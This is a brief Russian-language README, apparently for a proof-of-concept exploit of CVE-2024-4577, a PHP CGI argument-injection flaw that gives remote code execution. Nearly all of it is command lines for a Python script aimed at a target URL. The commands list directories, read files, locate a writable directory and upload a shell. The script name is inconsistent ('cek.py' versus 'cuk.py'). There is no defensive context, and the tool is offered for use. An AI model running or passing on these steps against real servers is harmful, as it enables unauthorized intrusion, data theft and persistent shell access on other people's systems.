
Доказательство концепции эксплуатации для CVE-2024-4577, уязвимости внедрения аргументов в PHP CGI, позволяющей удалённое выполнение кода и получение доступа к оболочке на уязвимых целях.
RCEpython3 cek.py --target http://target/index.php --ls --dir /path/to/directory
python3 cek.py --target https://target/index.php --dir /path/to/directory
python3 cek.py --target https://target/index.php --cat /path/to/directory
найти доступную для записи директорию
python3 cek.py --target https://target/index.php --find
загрузить оболочку
python3 cuk.py --target https://target/index.php